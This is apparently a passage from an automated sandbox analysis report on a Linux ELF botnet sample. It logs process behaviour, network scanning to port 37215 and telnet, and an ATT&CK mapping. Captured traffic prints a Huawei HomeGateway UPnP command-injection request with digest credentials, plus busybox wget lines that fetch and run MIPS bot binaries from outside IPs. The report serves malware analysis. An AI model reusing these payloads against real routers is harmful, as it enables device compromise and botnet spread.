6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 31 30 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 31 39 32 2e 31 36 38 2e 30 2e 31 34 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /cgi-bin/ViewLog.asp was not found on this server.</p><p>Additionally, a 500 Internal Server Errorerror was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.10 (Debian) Server at 192.168.0.14 Port 80</address></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 403 Forbidden
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Thu, 23 Nov 2023 04:18:22 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveContent-Encoding: gzipData Raw: 37 62 0d 0a 1f 8b 08 00 00 00 00 00 04 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 b4 24 a7 e6 95 a4 16 d9 d9 64 18 a2 eb 00 8a d8 e8 43 a5 41 66 03 15 41 79 79 e9 99 79 15 fa 86 7a 86 16 7a 06 0a 1a a1 49 a5 79 25 a5 9a c8 6a f5 61 a6 eb 43 5d 06 00 37 d7 58 cc a2 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 7b(HML),I310Q/Qp/K&T$dCAfAyyyzzIy%jaC]7X0
    Source: kTnqWHyjjG.elfString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
    Source: kTnqWHyjjG.elfString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
    Source: unknownHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: unknownDNS traffic detected: queries for: daisy.ubuntu.com
    Source: /tmp/kTnqWHyjjG.elf (PID: 5475)SIGKILL sent: pid: 940, result: successfulJump to behavior
    Source: /tmp/kTnqWHyjjG.elf (PID: 5481)SIGKILL sent: pid: 940, result: successfulJump to behavior
    Source: ELF static info symbol of initial sample.symtab present: no
    Source: Initial sampleString containing 'busybox' found: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: Initial sampleString containing 'busybox' found: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
    Source: classification engineClassification label: mal80.troj.linELF@0/0@2/0
    Source: /tmp/kTnqWHyjjG.elf (PID: 5481)File opened: /proc/490/fdJump to behavior
    Source: /tmp/kTnqWHyjjG.elf (PID: 5481)File opened: /proc/791/fdJump to behavior
    Source: /tmp/kTnqWHyjjG.elf (PID: 5481)File opened: /proc/794/fdJump to behavior
    Source: /tmp/kTnqWHyjjG.elf (PID: 5481)File opened: /proc/795/fdJump to behavior
    Source: /tmp/kTnqWHyjjG.elf (PID: 5481)File opened: /proc/797/fdJump to behavior
    Source: /tmp/kTnqWHyjjG.elf (PID: 5481)File opened: /proc/853/fdJump to behavior
    Source: /tmp/kTnqWHyjjG.elf (PID: 5481)File opened: /proc/917/fdJump to behavior
    Source: /tmp/kTnqWHyjjG.elf (PID: 5481)File opened: /proc/780/fdJump to behavior
    Source: /tmp/kTnqWHyjjG.elf (PID: 5481)File opened: /proc/1/fdJump to behavior
    Source: /tmp/kTnqWHyjjG.elf (PID: 5481)File opened: /proc/661/fdJump to behavior
    Source: /tmp/kTnqWHyjjG.elf (PID: 5481)File opened: /proc/782/fdJump to behavior
    Source: /tmp/kTnqWHyjjG.elf (PID: 5481)File opened: /proc/785/fdJump to behavior
    Source: /tmp/kTnqWHyjjG.elf (PID: 5481)File opened: /proc/940/fdJump to behavior
    Source: /tmp/kTnqWHyjjG.elf (PID: 5481)File opened: /proc/767/fdJump to behavior
    Source: /tmp/kTnqWHyjjG.elf (PID: 5481)File opened: /proc/800/fdJump to behavior
    Source: /tmp/kTnqWHyjjG.elf (PID: 5481)File opened: /proc/888/fdJump to behavior
    Source: /tmp/kTnqWHyjjG.elf (PID: 5481)File opened: /proc/801/fdJump to behavior
    Source: /tmp/kTnqWHyjjG.elf (PID: 5481)File opened: /proc/725/fdJump to behavior
    Source: /tmp/kTnqWHyjjG.elf (PID: 5481)File opened: /proc/769/fdJump to behavior
    Source: /tmp/kTnqWHyjjG.elf (PID: 5481)File opened: /proc/726/fdJump to behavior
    Source: /tmp/kTnqWHyjjG.elf (PID: 5481)File opened: /proc/803/fdJump to behavior
    Source: /tmp/kTnqWHyjjG.elf (PID: 5481)File opened: /proc/806/fdJump to behavior
    Source: /tmp/kTnqWHyjjG.elf (PID: 5481)File opened: /proc/807/fdJump to behavior
    Source: /tmp/kTnqWHyjjG.elf (PID: 5481)File opened: /proc/928/fdJump to behavior
    Source: /tmp/kTnqWHyjjG.elf (PID: 5475)File opened: /proc/490/fdJump to behavior
    Source: /tmp/kTnqWHyjjG.elf (PID: 5475)File opened: /proc/791/fdJump to behavior
    Source: /tmp/kTnqWHyjjG.elf (PID: 5475)File opened: /proc/794/fdJump to behavior
    Source: /tmp/kTnqWHyjjG.elf (PID: 5475)File opened: /proc/795/fdJump to behavior
    Source: /tmp/kTnqWHyjjG.elf (PID: 5475)File opened: /proc/797/fdJump to behavior
    Source: /tmp/kTnqWHyjjG.elf (PID: 5475)File opened: /proc/853/fdJump to behavior
    Source: /tmp/kTnqWHyjjG.elf (PID: 5475)File opened: /proc/917/fdJump to behavior
    Source: /tmp/kTnqWHyjjG.elf (PID: 5475)File opened: /proc/780/fdJump to behavior
    Source: /tmp/kTnqWHyjjG.elf (PID: 5475)File opened: /proc/1/fdJump to behavior
    Source: /tmp/kTnqWHyjjG.elf (PID: 5475)File opened: /proc/661/fdJump to behavior
    Source: /tmp/kTnqWHyjjG.elf (PID: 5475)File opened: /proc/782/fdJump to behavior
    Source: /tmp/kTnqWHyjjG.elf (PID: 5475)File opened: /proc/785/fdJump to behavior
    Source: /tmp/kTnqWHyjjG.elf (PID: 5475)File opened: /proc/940/fdJump to behavior
    Source: /tmp/kTnqWHyjjG.elf (PID: 5475)File opened: /proc/767/fdJump to behavior
    Source: /tmp/kTnqWHyjjG.elf (PID: 5475)File opened: /proc/800/fdJump to behavior
    Source: /tmp/kTnqWHyjjG.elf (PID: 5475)File opened: /proc/888/fdJump to behavior
    Source: /tmp/kTnqWHyjjG.elf (PID: 5475)File opened: /proc/801/fdJump to behavior
    Source: /tmp/kTnqWHyjjG.elf (PID: 5475)File opened: /proc/725/fdJump to behavior
    Source: /tmp/kTnqWHyjjG.elf (PID: 5475)File opened: /proc/769/fdJump to behavior
    Source: /tmp/kTnqWHyjjG.elf (PID: 5475)File opened: /proc/726/fdJump to behavior
    Source: /tmp/kTnqWHyjjG.elf (PID: 5475)File opened: /proc/803/fdJump to behavior
    Source: /tmp/kTnqWHyjjG.elf (PID: 5475)File opened: /proc/806/fdJump to behavior
    Source: /tmp/kTnqWHyjjG.elf (PID: 5475)File opened: /proc/807/fdJump to behavior
    Source: /tmp/kTnqWHyjjG.elf (PID: 5475)File opened: /proc/928/fdJump to behavior

    Hooking and other Techniques for Hiding and Protection

    barindex
    Source: unknownNetwork traffic detected: HTTP traffic on port 42390 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 35652 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 44226 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 42390 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 35652 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 42390 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 35652 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 44226 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 35652 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 42390 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 40842 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 44226 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 40842 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 51248 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 35652 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 42390 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 40842 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 39532
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 39584
    Source: unknownNetwork traffic detected: HTTP traffic on port 44226 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 39596
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 39634
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 39738
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 39760
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 39780
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 39794
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 39802
    Source: unknownNetwork traffic detected: HTTP traffic on port 42390 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 35652 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 39806
    Source: unknownNetwork traffic detected: HTTP traffic on port 40842 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 44226 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 38754 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 59846 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 59846 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 38754 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 47142 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 59846 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 38754 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 38754 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 59846 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 40842 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 59458 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 35652 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 42390 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 59458 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 37215 -> 59458
    Source: unknownNetwork traffic detected: HTTP traffic on port 42600 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 59846 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 38754 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 42600 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 42600 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 52056 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 38754 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 59846 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 41282 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 54822 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 37215 -> 54822
    Source: unknownNetwork traffic detected: HTTP traffic on port 52056 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 41282 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 60320 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 42600 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 34608 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 60320 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 52056 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 34608 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 60320 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 41282 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 34608 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 60320 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 34608 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 44226 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 52056 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 41282 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 34608 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 60320 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 40842 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 42600 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 59846 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 38754 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 34608 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 60320 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 52056 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 41282 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 40606 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 33132 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 37215 -> 33132
    Source: unknownNetwork traffic detected: HTTP traffic on port 51982 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 34608 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 42532 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 54828 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 37215 -> 54828
    Source: unknownNetwork traffic detected: HTTP traffic on port 42532 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 42532 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 47828
    Source: unknownNetwork traffic detected: HTTP traffic on port 42600 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 42532 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 51080 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 60320 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 51080 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 42532 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 51080 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 52056 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 44514 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 41282 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 44514 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 43244 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 51080 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 42532 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 44514 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 50106 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 43244 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 39356 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 55360 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 39356 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 50106 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 39356 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 55360 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 43244 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 39356 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 50140 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 37215 -> 50140
    Source: unknownNetwork traffic detected: HTTP traffic on port 50106 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 51906 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 56464 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 44514 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 55360 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 51906 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 37215 -> 51906
    Source: unknownNetwork traffic detected: HTTP traffic on port 56464 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 41782 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 39356 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 59218 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 36050 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 43244 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 40022 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 52240 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 39794 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 54550 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 55468
    Source: unknownNetwork traffic detected: HTTP traffic on port 37215 -> 39794
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 55468
    Source: unknownNetwork traffic detected: HTTP traffic on port 41782 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 55496
    Source: unknownNetwork traffic detected: HTTP traffic on port 40022 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 55522
    Source: unknownNetwork traffic detected: HTTP traffic on port 56464 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 59218 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 55522
    Source: unknownNetwork traffic detected: HTTP traffic on port 50106 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 55536
    Source: unknownNetwork traffic detected: HTTP traffic on port 40022 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 51080 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 55624
    Source: unknownNetwork traffic detected: HTTP traffic on port 55360 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 52240 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 54550 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 56296
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 55672
    Source: unknownNetwork traffic detected: HTTP traffic on port 43164 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 55710
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 56338
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 55740
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 56376
    Source: unknownNetwork traffic detected: HTTP traffic on port 44612 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 37215 -> 44612
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 55752
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 56388
    Source: unknownNetwork traffic detected: HTTP traffic on port 41782 -> 37215
    Source: /tmp/kTnqWHyjjG.elf (PID: 5473)Queries kernel information via 'uname': Jump to behavior
    Source: kTnqWHyjjG.elf, 5473.1.00007ffd15dfc000.00007ffd15e1d000.rw-.sdmp, kTnqWHyjjG.elf, 5475.1.00007ffd15dfc000.00007ffd15e1d000.rw-.sdmp, kTnqWHyjjG.elf, 5595.1.00007ffd15dfc000.00007ffd15e1d000.rw-.sdmp, kTnqWHyjjG.elf, 5627.1.00007ffd15dfc000.00007ffd15e1d000.rw-.sdmp, kTnqWHyjjG.elf, 5601.1.00007ffd15dfc000.00007ffd15e1d000.rw-.sdmp, kTnqWHyjjG.elf, 5476.1.00007ffd15dfc000.00007ffd15e1d000.rw-.sdmp, kTnqWHyjjG.elf, 5606.1.00007ffd15dfc000.00007ffd15e1d000.rw-.sdmp, kTnqWHyjjG.elf, 5482.1.00007ffd15dfc000.00007ffd15e1d000.rw-.sdmpBinary or memory string: Y_x86_64/usr/bin/qemu-m68k/tmp/kTnqWHyjjG.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/kTnqWHyjjG.elf
    Source: kTnqWHyjjG.elf, 5473.1.00007ffd15dfc000.00007ffd15e1d000.rw-.sdmp, kTnqWHyjjG.elf, 5475.1.00007ffd15dfc000.00007ffd15e1d000.rw-.sdmp, kTnqWHyjjG.elf, 5595.1.00007ffd15dfc000.00007ffd15e1d000.rw-.sdmp, kTnqWHyjjG.elf, 5627.1.00007ffd15dfc000.00007ffd15e1d000.rw-.sdmp, kTnqWHyjjG.elf, 5601.1.00007ffd15dfc000.00007ffd15e1d000.rw-.sdmp, kTnqWHyjjG.elf, 5476.1.00007ffd15dfc000.00007ffd15e1d000.rw-.sdmp, kTnqWHyjjG.elf, 5606.1.00007ffd15dfc000.00007ffd15e1d000.rw-.sdmp, kTnqWHyjjG.elf, 5482.1.00007ffd15dfc000.00007ffd15e1d000.rw-.sdmpBinary or memory string: /usr/bin/qemu-m68k
    Source: kTnqWHyjjG.elf, 5473.1.00005617df3df000.00005617df464000.rw-.sdmp, kTnqWHyjjG.elf, 5475.1.00005617df3df000.00005617df464000.rw-.sdmp, kTnqWHyjjG.elf, 5595.1.00005617df3df000.00005617df464000.rw-.sdmp, kTnqWHyjjG.elf, 5627.1.00005617df3df000.00005617df464000.rw-.sdmp, kTnqWHyjjG.elf, 5601.1.00005617df3df000.00005617df464000.rw-.sdmp, kTnqWHyjjG.elf, 5476.1.00005617df3df000.00005617df464000.rw-.sdmp, kTnqWHyjjG.elf, 5606.1.00005617df3df000.00005617df464000.rw-.sdmp, kTnqWHyjjG.elf, 5482.1.00005617df3df000.00005617df464000.rw-.sdmpBinary or memory string: /etc/qemu-binfmt/m68k
    Source: kTnqWHyjjG.elf, 5473.1.00005617df3df000.00005617df464000.rw-.sdmp, kTnqWHyjjG.elf, 5475.1.00005617df3df000.00005617df464000.rw-.sdmp, kTnqWHyjjG.elf, 5595.1.00005617df3df000.00005617df464000.rw-.sdmp, kTnqWHyjjG.elf, 5627.1.00005617df3df000.00005617df464000.rw-.sdmp, kTnqWHyjjG.elf, 5601.1.00005617df3df000.00005617df464000.rw-.sdmp, kTnqWHyjjG.elf, 5476.1.00005617df3df000.00005617df464000.rw-.sdmp, kTnqWHyjjG.elf, 5606.1.00005617df3df000.00005617df464000.rw-.sdmp, kTnqWHyjjG.elf, 5482.1.00005617df3df000.00005617df464000.rw-.sdmpBinary or memory string: V!/etc/qemu-binfmt/m68k

    Stealing of Sensitive Information

    barindex
    Source: Yara matchFile source: dump.pcap, type: PCAP

    Remote Access Functionality

    barindex
    Source: Yara matchFile source: dump.pcap, type: PCAP
    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpactResource DevelopmentReconnaissance
    Valid AccountsWindows Management InstrumentationPath InterceptionPath InterceptionDirect Volume Access1
    OS Credential Dumping
    11
    Security Software Discovery
    Remote ServicesData from Local SystemExfiltration Over Other Network Medium1
    Encrypted Channel
    Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationAbuse Accessibility FeaturesAcquire InfrastructureGather Victim Identity Information
    Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsRootkitLSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth11
    Non-Standard Port
    SIM Card SwapObtain Device Cloud BackupsNetwork Denial of ServiceDomainsCredentials
    Domain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration3
    Non-Application Layer Protocol
    Data Encrypted for ImpactDNS ServerEmail Addresses
    Local AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureTraffic Duplication4
    Application Layer Protocol
    Data DestructionVirtual Private ServerEmployee Names
    Cloud AccountsLaunchdNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA SecretsInternet Connection DiscoverySSHKeyloggingScheduled Transfer2
    Ingress Tool Transfer
    Data Encrypted for ImpactServerGather Victim Network Information
    No configs have been found
    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Number of created Files
    • Is malicious
    • Internet
